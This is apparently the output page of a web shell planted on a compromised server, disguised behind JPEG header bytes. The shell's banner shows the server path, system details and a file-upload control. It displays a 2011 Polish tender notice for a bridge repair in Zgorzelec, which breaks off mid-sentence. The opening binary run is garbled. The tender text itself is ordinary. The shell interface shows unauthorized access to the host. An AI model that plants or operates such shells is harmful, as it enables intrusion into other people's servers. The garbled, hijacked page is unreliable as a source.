JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110512/110342-N-2011.html

<p class="kh_header"><b>Zgorzelec: Odbudowa (remont) mostu na rzece Czerowna Woda w ciągu drogi gminnej nr 109271D ul. Francuskiej w Zgorzelcu</b><br>
<b>Numer ogłoszenia: 110342 - 2011; data zamieszczenia: 12.05.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbudowa (remont) mostu na rzece Czerowna Woda w ciągu drogi gminnej nr 109271D ul. Francuskiej w Zgorzelcu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> . Przedmiotem zamówienia  są roboty budowlane polegające na odbudowie (remoncie) mostu 
 drogowego położonego w ciągu ul. Francuskiej w Zgorzelcu.  

2. Most jest zlokalizowany nad rzeką Czerwona Woda na działkach nr 23/1 obręb X AM2; 11/2     
    obręb X AM3; 59/2, 37 obręb XI AM3 Zgorzelec Miasto. 

3. Parametry techniczne mostu:
    a) powierzchnia przęsła mostu - 312,7m2 , 
    b) długość całkowita przęsła mostu - 26,50 m2 , 
    c) szerokość jezdni  - 7,00 m, 
    d) ilość przęseł - 1, 
    e) ilość dźwigarów głównych - 1,34m,       
    f) wysokość dźwigarów głównych - 1,34 m, 
    g) długość całkowita mostu - 33,55 m, 
    h) szerokość mostu  - 11,80 m, 
    i) szerokość chodników - 2 x 2,20 m, 
    j) ilość podpór  - 2, 
    k) wysokość konstrukcyjna dźwigara 1,61 m.   

4. Obciążenie samochodowe mostu winno być II klasy, co jest równoznaczne z nośnością użytkową 
    15 ton. 

5. Obiekt został wybudowany w latach 1966-67.Obecnie jest zamknięty dla ruchu. 

6. W ramach robót budowlanych należy wykonać:
    1) karczowanie drzew i krzewów w odległości 10 m od przyczółków mostu,
    2) roboty rozbiórkowe wyposażenia, 
    3) czyszczenie strumieniowo-ścierne konstrukcji celem usunięcia skorodowanych
  warstw konstrukcji, 
    4) dokładny przegląd konstrukcji w ramach nadzoru autorskiego, 
    5) roboty reprofilacyjne i zabezpieczające powierzchniowo beton konstrukcji przęsła i 
   podpór, 
    6) oczyszczenie płyty pomostowej i usunięcie skorodowanych elementów, 
    7) sprężenie zewnętrzne przęsła mostu, 
    8) wykonanie elementów kotwienia płyty wtórnej oraz zbrojenie płyty wtórnej, 
    9) wykonanie płyty pomostowej wtórnej C30/37 F150 W8, 
  10) wykonanie izolacji płyty pomostowej,
  11) wykonanie napraw: przyczółków, belek, płyty pomostowej, łożysk,
  12) wymiana urządzeń obcych (poza zakresem opracowania), 
  13) wykonanie nawierzchni na moście,
  14) wykonanie chodników, 
  15) zabezpieczenie konstrukcji mostu powłokami  malarskimi na bazie żywic 
        syntetycznych,
  16) wykonanie i montaż nowych balustrad ze stali nierdzewnej, 
  17) roboty ziemne: profilowanie skarp wokół przyczółków, 
  18) wykonanie oznakowania drogowego, 
  19) regulacja wpustów i studzienek. 

7. W ramach robót budowlanych nie przewiduje się montażu barier drogowych. 


8.  Zamawiający zakłada, iż w ramach robót nie będzie konieczna wycinka drzew,  
     wymagająca stosownego zezwolenia. W przypadku zaistnienia konieczności wycinki 
     drzew, opłaty z nią związane  poniesie Zamawiający. 

9.  Wykonawca przed przystąpieniem do realizacji robót budowlanych, przedstawi 
     Zamawiającemu wykonany i zatwierdzony projekt tymczasowej organizacji ruchu 
     na  czas trwania robót budowlanych.  

10. Wykonawca ma obowiązek opracować projekt docelowej organizacji ruchu,  
      uzyskać jego pozytywne zatwierdzenie oraz wykonać oznakowanie drogowe 
      docelowe.           

11. Zamawiający wymaga, by Wykonawca powiadomił wszystkie instytucje obsługujące 
      urządzenia,  instalacje podziemne i naziemne o prowadzonych robotach budowlanych,
      w celu przeprowadzenia przez te instytucje wszelkich niezbędnych adaptacji oraz innych
      koniecznych robót  w obrębie placu budowy, w możliwie najkrótszym czasie, 
      nie dłuższym jednak niż  w czasie  przewidzianym na realizację robót. Wykonawca 
      ułatwi przeprowadzenie wymienionych wyżej robót i będzie ściśle współpracował z tymi 
      instytucjami. 

12. Szczegółowy opis i zakres robót dla zadania objętego odbudową mostu przy ul. 
      Francuskiej  został zawarty   w dokumentacji projektowej składającej się z 
Projektu Budowlanego, Specyfikacji Technicznej Wykonania i Odbioru Robót,  
      Informacji dotyczącej bezpieczeństwa i ochrony zdrowia, rysunków: projekt 
      zagospodarowania terenu, plan sprężenia, widok strefy zakotwienia - przekrój 
      podłużny, strefa zakotwienia kabli, zbrojenie belek w strefie zakotwienia, zbrojenie 
      nadbetonu, zbrojenie kap, siodełko profilowane, siodełko proste, balustrady  - załącznik 
      nr 8 do SIWZ.  
  
13. Wykonawca jako wytwórca odpadów w rozumieniu art. 3 ust. 3 pkt 22 ustawy o 
      odpadach, ma obowiązek zagospodarowania odpadów powstałych podczas realizacji 
      zamówienia, zgodnie z ustawą o odpadach z dnia 27 kwietnia 2001r. (tekst jednolity z 
      2010r. Dz. U. Nr 185, poz. 1243 z późn. zm.)  i ustawą Prawo ochrony środowiska  z 
      dnia  27 kwietnia 2001r. (tekst jednolity z 2008r. Dz. U. Nr 25, poz.150 z późn.zm.). 
 
14. Wykonawca przedstawi Zamawiającemu potwierdzenie zagospodarowania odpadów
      zgodnie z powszechnie obowiązującymi przepisami.    

15. Zobowiązuje się Wykonawcę do opracowania kompletnej dokumentacji 
      powykonawczej w 2-ch  egzemplarzach  i przekazanie jej Zamawiającemu 
      wraz ze zgłoszeniem gotowości robót  budowlanych do odbioru.  
      W skład kompletnej dokumentacji powykonawczej wchodzi:
      1) atesty i certyfikaty wbudowanych materiałów, prefabrykatów lub urządzeń, 
      2) aprobaty techniczne, 
      3) uzupełniony dziennik robót, 
      4) wymagane przepisami, protokoły i zaświadczenia z przeprowadzonych przez 
          Wykonawcę badań i sprawdzeń, 
      5) oświadczenie kierownika budowy o zgodności wykonania obiektu budowlanego
          z projektem budowlanym, warunkami pozwolenia na budowę/lub zgłoszenia robót, 
          przepisami i obowiązującymi Polskimi Normami oraz  oświadczenie kierownika 
          budowy o doprowadzeniu do należytego stanu i porządku  terenu budowy, a także 
           sąsiedniej ulicy, nieruchomości, 
      6)  w przypadku zmian nie odstępujących w sposób istotny od zatwierdzonego projektu i 
           warunków zgłoszenia robót niewymagających  pozwolenia na budowę, Wykonawca 
           dołączy kopie rysunków wchodzących w skład zatwierdzonego projektu budowlanego 
           z naniesionymi zmianami i uzupełniającym opisem, w takim przypadku oświadczenie 
           kierownika budowy powinno być zatwierdzone przez Projektanta i Inspektora 
           Nadzoru, 
      7)  oświadczenie kierownika budowy o wbudowaniu materiałów, na które dostarczono 
           dokumenty odbiorowe, oraz zgodności materiałów ze Specyfikacją Techniczną 
           Wykonania i odbioru Robót i Projektem Budowlanym, 
      8)  oświadczenie Inspektora Nadzoru o zgodności wykonania obiektu budowlanego z 
           projektem budowlanym,  warunkami  zgłoszenia 04.03.2011r.,   przepisami i 
           obowiązującymi Polskimi Normami,      
      9)  pisemną gwarancję jakości na wykonany przedmiot umowy, z treści dokumentu 
           gwarancyjnego powinno wynikać, na co jest udzielona gwarancja, jak długo 
           gwarancja obowiązuje,   
     10) deklarację zgodności materiałów z określeniem miejsca przeznaczenia zgodnie z 
           ustawą z dnia 16.04.2004r. o wyrobach budowlanych (Dz. U.z 2004r. Nr 92 poz. 881 
           z  późn.zm.) oraz ustawą z dnia 30.08.2002r.o systemie oceny zgodności (tekst 
           jednolity z 2010r., Dz.U. Nr 138, poz. 935 z późn.zm.),      

16. Przed przystąpieniem do w/w robót Wykonawca winien   dokonać wizji lokalnej 
      terenu, objętego robotą budowlaną, celem zapoznania się z warunkami realizacji 
      przedmiotu zamówienia.  Wizję lokalną Wykonawca dokona na koszt własny.         

17. Wykonawca zobowiązany jest  wykonać przedmiot zamówienia zgodnie z 
      dokumentacją projektową,  technologią wskazaną przez Projektanta, zgodnie z zasadami 
      wiedzy  technicznej, normami,  wskazaniami Zamawiającego, oraz obowiązującymi   
      przepisami.

18. Wykonawca wykona przedmiot zamówienia z materiałów własnych, które powinny 
      odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i stosowania 
      w  budownictwie zgodnie z  art. 10 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tekst 
      jednolity z 2010r. Dz. U. Nr 243, poz. 1623 z późn.zm.). 

19. Zamawiający wymaga 36 miesięcznego okresu gwarancji i rękojmi na wykonane roboty 
      budowlane  i zastosowane przy realizacji zamówienia materiały budowlane. 
      W dniu podpisania bezusterkowego protokołu odbioru robót, Wykonawca          
      potwierdzi  Zamawiającemu udzielenie gwarancji jakości  na wykonany  przedmiot 
      umowy  i zastosowane do realizacji zamówienia  materiały wraz z podaniem terminu 
      upływu gwarancji. 
      Jeżeli producent udzieli dłuższej gwarancji na materiały zastosowane do wykonania 
      przedmiotu zamówienia, obowiązywać będzie  gwarancja producenta.

20. W ramach udzielonej gwarancji Wykonawca zobowiązany będzie do przeprowadzania  
      w  każdym roku kalendarzowym, przeglądów  gwarancyjnych a także  przeglądu 
      pogwarancyjnego.     




21. Oferty równoważne 

       W przypadku wystąpienia w dokumentacji projektowej, opisu przedmiotu zamówienia 
       przez wskazanie znaku towarowego, patentu lub pochodzenia,  Zamawiający dopuszcza 
       składanie ofert równoważnych z zastosowaniem innych materiałów i urządzeń niż podane 
       w dokumentacji projektowej, pod  warunkiem, że zaproponowane urządzenia i materiały 
       będą posiadały parametry techniczne nie gorsze niż te, które przedstawiono w 
       dokumentacji projektowej.
       Zgodnie z art. 30 ust. 5 ustawy Pzp Wykonawca, który powołuje się na rozwiązania 
       równoważne, jest obowiązany wykazać, że oferowane przez niego materiały i urządzenia
       spełniają wymagania określone przez Zamawiającego.               
       W takim przypadku Wykonawca musi załączyć do oferty foldery, dane techniczne i 
       aprobaty techniczne tych materiałów i urządzeń, aby Zamawiający mógł sprawdzić czy 
       odpowiadają one wymaganiom postawionym w dokumentacji projektowej.  
       Zaoferowane urządzenia i materiały równoważne muszą odpowiadać co do jakości 
       wymogom  wyrobów opisanych w punkcie 18..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Roboty budowlane polegające na powtórzeniu tego samego rodzaju zamówień, stanowiące nie
więcej niż 50% wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt. 6 ustawy Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.22.11.11-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 139.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od wykonawców wniesienia wadium w wysokości  20 280,00 zł. 
    PLN (słownie: dwadzieścia tysięcy dwieście osiemdziesiąt zł.).
2. Wykonawca obowiązany jest wnieść wadium przed upływem terminu składania ofert. 
    Wadium musi być na koncie Zamawiającego przed upływem terminu składania 
    ofert.  
3. Wykonawca, który nie wniesie wadium do upływu terminu składania ofert, na 
    przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 
    ustawy Pzp, albo nie zgodzi się na przedłużenie okresu związania ofertą zostanie 
    wykluczony z postępowania o udzielenie zamówienia, a oferta Wykonawcy 
    wykluczonego zostanie odrzucona zgodnie z art. 24 ust. 2 pkt. 4 ustawy Pzp.
4. W zależności od woli wykonawcy wadium może być wnoszone w następujących  
    formach:
1)	pieniądzu,
        2)   poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo-
              kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
        3)   gwarancjach bankowych,
        4)   gwarancjach ubezpieczeniowych,
        5)   poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2
              ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju 
              Przedsiębiorczości   (Dz.U. Nr 109, poz. 1158 z póź.zm.).
UWAGA!
    Wadium wniesione w formach o których mowa w art. 45 ust. 6 pkt. 2-5 ustawy 
    Pzp  musi gwarantować  Beneficjentowi zapłatę sumy gwarancyjnej jeżeli 
    Wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 
    ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których  mowa w art. 25 
    ust. 1, lub pełnomocnictw.  
5. Zamawiający wymaga załączenia do oferty dokumentu potwierdzającego 
    wniesienie wadium do Zamawiającego.
6. Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
    Zamawiającego Nr 35124012971111000025654013 Bank PEKAO S.A. I
    O/Zgorzelec.
    Na przelewie należy  umieścić informację :
    Wadium na Odbudowa (remont) mostu na rzece Czerwona Woda w ciągu drogi gminnej
nr 109271D ul. Francuskiej w Zgorzelcu
7. Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze
    najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, 
    którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 24.13 
    SIWZ. 
8. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający 
    zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego 
    oraz wniesieniu zabezpieczenia należytego wykonania umowy.  
9.  Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał 
     ofertę przed  upływem terminu składania ofert. 


10. Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu
      zwrócono wadium na podstawie art. 46 ust. 1 ustawy Pzp , jeżeli w wyniku 
      ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako 
      najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez 
      Zamawiającego. 
11. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami
      wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
      pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej 
      za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę .
12. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
      oferta  została wybrana :
         a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
             określonych w ofercie, 
         b/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
         c/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
             przyczyn   leżących  po stronie wykonawcy.
13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w 
      odpowiedzi  na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył 
      dokumentów lub oświadczeń,   o których mowa w art. 25 ust. 1 ustawy Pzp, chyba 
      że udowodni, ze wynika to z przyczyn należących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie                                     
     w oparciu o analizę przedłożonych przez Wykonawców dokumentów i oświadczeń,  
     określonych przez Zamawiającego  w pkt.11 - 12 SIWZ. 
2) Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
     spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny.
3) Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających 
     spełnienie warunków udziału w postępowaniu zostaną wykluczeni z postępowania
     z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.   
4)  Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, iż wykonał: 
- dwie  roboty budowlane polegające na budowie lub remoncie mostów
   żelbetowych - sprężonych o łącznej wartości brutto min. 1 245 000,00 zł.  
   zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie                                     
     w oparciu o analizę przedłożonych przez Wykonawców dokumentów i oświadczeń,  
     określonych przez Zamawiającego  w pkt.11 - 12 SIWZ. 
2) Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
     spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny.
3) Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających 
     spełnienie warunków udziału w postępowaniu zostaną wykluczeni z postępowania
     z zastrzeżeniem art. 26 ust. 3 ustawy Pzp. 
4)  Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż dysponuje  
minimum 1 osobą, która będzie wykonywać zamówienie,  posiadającą           
      uprawnienia budowlane w specjalności mostowej bez ograniczeń, uprawniające  
      do kierowania robotami budowlanymi związanymi z drogowym obiektem 
      inżynierskim, w rozumieniu przepisów o drogach publicznych, lub 
      odpowiadające im uprawnienia w    specjalności konstrukcyjno-budowlanej 
      wydane przed 11.07.2003r.,  wraz z informacją Wykonawcy o podstawie do 
      dysponowania tą osobą.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi załączyć następujące dokumenty:   
      
1)  wypełniony i podpisany formularz ofertowy (wg. załączonego wzoru), 
2)  informacja  na temat Wykonawcy (wg zał. wzoru ) - załącznik nr 1 do SIWZ
     (w przypadku złożenia oferty wspólnej, dokument składa każdy z członków 
     konsorcjum), 
3)  oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. Prawo  
      zamówień   publicznych - załącznik nr 2 do SIWZ, 
      Powyższe oświadczenie, Wykonawca składa w przypadku gdy  zamierza 
      powierzyć do wykonania  części zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewidział możliwość dokonania zmian postanowień umowy,  przy czym 
 warunki takiej zmiany Zamawiający określił  w § 12 ust. 2  projektu umowy. 

1. Zakres przewidzianych zmian:

1) termin określony w pkt. 4 SIWZ i § 3 ust. 1 projektu umowy  ulegnie  przesunięciu w 
